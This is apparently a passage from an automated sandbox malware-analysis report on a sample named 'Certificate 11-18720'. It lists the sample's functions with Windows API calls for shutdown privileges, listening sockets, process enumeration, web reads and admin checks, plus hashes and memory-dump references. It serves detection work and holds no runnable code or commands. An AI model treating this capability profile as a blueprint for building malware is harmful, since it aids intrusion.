                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                    • API String ID: 2234035333-194228
                                                                                    • Opcode ID: 760aace1b9bae924550935ff41ab52f6c04b58f7adc937bc32a3517b4cc4dbfa
                                                                                    • Instruction ID: 6f1269e5bdede04af11495b36df6a025d77e17f4680934ce6a219bcb752cc2d6
                                                                                    • Opcode Fuzzy Hash: 760aace1b9bae924550935ff41ab52f6c04b58f7adc937bc32a3517b4cc4dbfa
                                                                                    • Instruction Fuzzy Hash: CF01F771FD82126AF72C5668CC5ABFF365A9B00740F244824FA53E21C2DAA47E0181B0
                                                                                    Function 00618C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00618CA8
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00618CB7
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00618CD3
                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00618CE2
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00618CFC
                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00618D10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                    • String ID:
                                                                                    • API String ID: 1279440585-0
                                                                                    • Opcode ID: 513718637d43385d8610266d71528e6de17c88d56a02614210a41bf93319e92d
                                                                                    • Instruction ID: 4ddf5c040b2702aa52ae05838a5dae5b0ce13c77a6f3acba3b0b06f162c59075
                                                                                    • Opcode Fuzzy Hash: 513718637d43385d8610266d71528e6de17c88d56a02614210a41bf93319e92d
                                                                                    • Instruction Fuzzy Hash: 1121A235A002019FCB10EF68DD45BAE77AAFF49720F144159F916A73D2CB30AD418B51
                                                                                    Function 00606532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00606554
                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00606564
                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00606583
                                                                                    • __wsplitpath.LIBCMT ref: 006065A7
                                                                                    • _wcscat.LIBCMT ref: 006065BA
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 006065F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                    • String ID:
                                                                                    • API String ID: 1605983538-0
                                                                                    • Opcode ID: 16f4b4ff52d93933fd5c4da8819d54e70ae22b735757d1f816249a32e0a5923c
                                                                                    • Instruction ID: c525273ed89e9afe7f173493e6be49a4712971effbbf0e0595d6a0798df26b93
                                                                                    • Opcode Fuzzy Hash: 16f4b4ff52d93933fd5c4da8819d54e70ae22b735757d1f816249a32e0a5923c
                                                                                    • Instruction Fuzzy Hash: 0321A771D40259ABDB25AFA4CC88FDEBBBDAB49300F5000A5F545D3281E7719F85CB60
                                                                                    Function 005C9B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$f
                                                                                    • API String ID: 0-990064628
                                                                                    • Opcode ID: bd8aaa855c782cc9ef62948b5d2985e3090fdca51474ad97c095dee5bae30ee7
                                                                                    • Instruction ID: 59938d19c41d4681107dc17a910b1314ebb844294c23caa8915b3383c0b196ef
                                                                                    • Opcode Fuzzy Hash: bd8aaa855c782cc9ef62948b5d2985e3090fdca51474ad97c095dee5bae30ee7
                                                                                    • Instruction Fuzzy Hash: 0B927C75E0121ACFDF24CF98C884BEDBBB2BB54314F14859AE816AB380D7719D81DB91
                                                                                    Function 006013CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006013DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen
                                                                                    • String ID: ($,2g$<2g$|
                                                                                    • API String ID: 1659193697-3143567505
                                                                                    • Opcode ID: 0fa57469685da109fce56c2145786444a5301bc6dab202c83def8dbf6c82ffc3
                                                                                    • Instruction ID: 6d3c6146364c776c12da6aa33df104a84364546fdd7941107adc731f5bdca152
                                                                                    • Opcode Fuzzy Hash: 0fa57469685da109fce56c2145786444a5301bc6dab202c83def8dbf6c82ffc3
                                                                                    • Instruction Fuzzy Hash: C6323675A407059FCB28CF69C480AAAB7F1FF48310B15C56EE59ADB3A2E770E941CB44
                                                                                    Function 0061923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0061A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0061A84E
                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00619296
                                                                                    • WSAGetLastError.WSOCK32(00000000,00000000), ref: 006192B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 4170576061-0
                                                                                    • Opcode ID: 7faec9b3d0455236f23abc2982b421ba54c0b6b544c1555755d82fcb0bdba70c
                                                                                    • Instruction ID: e8335f7f7b5a936574c0570ad1c71e4271d361d20823a7a82cc273da97bb8635
                                                                                    • Opcode Fuzzy Hash: 7faec9b3d0455236f23abc2982b421ba54c0b6b544c1555755d82fcb0bdba70c
                                                                                    • Instruction Fuzzy Hash: 6641E470600501AFDB14AB68C85AF7E7BEEEF84724F04444EF9569B3D2CB749D018B91
                                                                                    Function 0060EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0060EB8A
                                                                                    • _wcscmp.LIBCMT ref: 0060EBBA
                                                                                    • _wcscmp.LIBCMT ref: 0060EBCF
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0060EBE0
                                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0060EC0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 2387731787-0
                                                                                    • Opcode ID: 31e527528ab4d87cc28ead1988675d34ac058acd35bb1593f11942135f6b1848
                                                                                    • Instruction ID: 3b3507a7f27dc189971c0ba62c6d7ddd6a735092f1781b1ef94be1505052011f
                                                                                    • Opcode Fuzzy Hash: 31e527528ab4d87cc28ead1988675d34ac058acd35bb1593f11942135f6b1848
                                                                                    • Instruction Fuzzy Hash: 7441CF356006029FD718DF68C490A9AB7E5FF89324F10495EEA6A8B3A1DB32AD40CF51
                                                                                    Function 00628111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                    • String ID:
                                                                                    • API String ID: 292994002-0
                                                                                    • Opcode ID: 16e0998d8b772208afe3ada87c361b91f72502c745631a38c9c9a2b3eb87f209
                                                                                    • Instruction ID: e74eea411ad26a72a88cf7d3720948d61204f4717d0fdc780fe877b4e787efd8
                                                                                    • Opcode Fuzzy Hash: 16e0998d8b772208afe3ada87c361b91f72502c745631a38c9c9a2b3eb87f209
                                                                                    • Instruction Fuzzy Hash: 3F11E6317019226FE7215F16EC48FAF7B9AEF91760F000429F809D7381CF309C128A90
                                                                                    Function 005DE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,005DE014,74DF0AE0,005DDEF1,0065DC38,?,?), ref: 005DE02C
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 005DE03E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                    • API String ID: 2574300362-192647395
                                                                                    • Opcode ID: 0023dd43f57ffcf3671af2a8d4bca116a65f8cb9d49f77b85a7cdb68d40a1634
                                                                                    • Instruction ID: b17f464a66406dcf5b3e83d89dbf0f9a2114694bc724d4206d4313db542e4ffa
                                                                                    • Opcode Fuzzy Hash: 0023dd43f57ffcf3671af2a8d4bca116a65f8cb9d49f77b85a7cdb68d40a1634
                                                                                    • Instruction Fuzzy Hash: C0D0A7749007139FC7315F64EC0D6127AD6BB01300F19841BE885D3250DBB4C880C760
                                                                                    Function 005DB11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 005DB22F
                                                                                      • Part of subcall function 005DB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 005DB5A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Proc$LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2749884682-0
                                                                                    • Opcode ID: aee593bcdc82a7ba890132323d814b017e4a8b8aad6563ee60689b1113a3a379
                                                                                    • Instruction ID: f6f581a44de07596b9a89f379eb677888261d9089c69dbef6c8bce0c1a0830d1
                                                                                    • Opcode Fuzzy Hash: aee593bcdc82a7ba890132323d814b017e4a8b8aad6563ee60689b1113a3a379
                                                                                    • Instruction Fuzzy Hash: 3CA10565114005FAFB386B6D5C88EBF2D6FFB96350F124A2FF401D6392DB169C0192B2
                                                                                    Function 00614EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006143BF,00000000), ref: 00614FA6
                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00614FD2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                    • String ID:
                                                                                    • API String ID: 599397726-0
                                                                                    • Opcode ID: 043b009154773a58e77689e6012badc644104662928849800a2881b3a3be40cc
                                                                                    • Instruction ID: 02904d10645545cf1b8fd74a9ba7b76fe31d4042e1dcddab14fe0e8f00532ddc
                                                                                    • Opcode Fuzzy Hash: 043b009154773a58e77689e6012badc644104662928849800a2881b3a3be40cc
                                                                                    • Instruction Fuzzy Hash: BE41D971504205FFEB209E94DC85EFFB7BEEB80755F14402EF205A7240DA719E829650
                                                                                    Function 005C77B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID: \Qg
                                                                                    • API String ID: 4104443479-3935409704
                                                                                    • Opcode ID: 3f8306257baa6dd9b0cb37b8aa1fcdb3fb32208e0ffb9bf4c8385e0515b2b00f
                                                                                    • Instruction ID: 414a8853b191cb9876e1e9a82deef11bd69c598dec85f28da92a0b67b9b6a62e
                                                                                    • Opcode Fuzzy Hash: 3f8306257baa6dd9b0cb37b8aa1fcdb3fb32208e0ffb9bf4c8385e0515b2b00f
                                                                                    • Instruction Fuzzy Hash: CAA23C74904219CFDB24CF98C880BADBBB2FF49314F2581A9D859AB791D7349D81DF90
                                                                                    Function 0060E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0060E20D
                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0060E267
                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0060E2B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                    • String ID:
                                                                                    • API String ID: 1682464887-0
                                                                                    • Opcode ID: 119573dbbf70606c7552d7ca1fd02e470a88dbd8d6081998263aa8292fdf130b
                                                                                    • Instruction ID: 3ebac50b0ba780a3229b1e6e2d55cfd08ef5e4fc291ffbd14ebfe868563e7c93
                                                                                    • Opcode Fuzzy Hash: 119573dbbf70606c7552d7ca1fd02e470a88dbd8d6081998263aa8292fdf130b
                                                                                    • Instruction Fuzzy Hash: 0C216D35A00119EFCB04EFA5D884EAEFBB9FF89310F0484AAE905A7391DB319D05CB50
                                                                                    Function 005FB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DF4EA: std::exception::exception.LIBCMT ref: 005DF51E
                                                                                      • Part of subcall function 005DF4EA: __CxxThrowException@8.LIBCMT ref: 005DF533
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005FB180
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005FB1AD
                                                                                    • GetLastError.KERNEL32 ref: 005FB1BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 1922334811-0
                                                                                    • Opcode ID: d89bfc91298f5353ed40a96a8311a62ec94a03f5dcb28c0d5a78aad2aea99cf1
                                                                                    • Instruction ID: 7dd4ae236e0b6029e021366db11d10cf5961af54b56d139f48ec22add9914bce
                                                                                    • Opcode Fuzzy Hash: d89bfc91298f5353ed40a96a8311a62ec94a03f5dcb28c0d5a78aad2aea99cf1
                                                                                    • Instruction Fuzzy Hash: A2118CB2904305AFE728AF68DC85D2BBBADFB45710B20892EE55697241DB74FC41CB60
                                                                                    Function 00606606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00606623
                                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00606664
                                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0060666F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                    • String ID:
                                                                                    • API String ID: 33631002-0
                                                                                    • Opcode ID: 433179924ca7eab14982b834cfeaedf7c907fce76967ede97176eba28086af24
                                                                                    • Instruction ID: d961fa6209a1ddf6d861e8acba13b3dbc04620a70b1bf071a8ecb24b8e7139e0
                                                                                    • Opcode Fuzzy Hash: 433179924ca7eab14982b834cfeaedf7c907fce76967ede97176eba28086af24
                                                                                    • Instruction Fuzzy Hash: DF115EB5E11228BFDB158FA4DC44BAFBBBDEB46B10F104152F900E7290D3B15A058BA1
                                                                                    Function 006071FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00607223
                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0060723A
                                                                                    • FreeSid.ADVAPI32(?), ref: 0060724A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                    • String ID:
                                                                                    • API String ID: 3429775523-0
                                                                                    • Opcode ID: e704047e241fb21321e2724221de4f290802373cbe862f4c6da6457bead0d969
                                                                                    • Instruction ID: 2cc8468d0bf74384a9df2a9abe2ef20498e5cc3b59f9f03deb4a5324786dd008
                                                                                    • Opcode Fuzzy Hash: e704047e241fb21321e2724221de4f290802373cbe862f4c6da6457bead0d969
                                                                                    • Instruction Fuzzy Hash: C1F01D7AE44209BFDF04DFE4DD89AEEBBB9EF09601F105469A602E3191E2709A448B10
                                                                                    Function 0060F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0060F599
                                                                                    • FindClose.KERNEL32(00000000), ref: 0060F5C9
                                                                                    Memory Dump Source
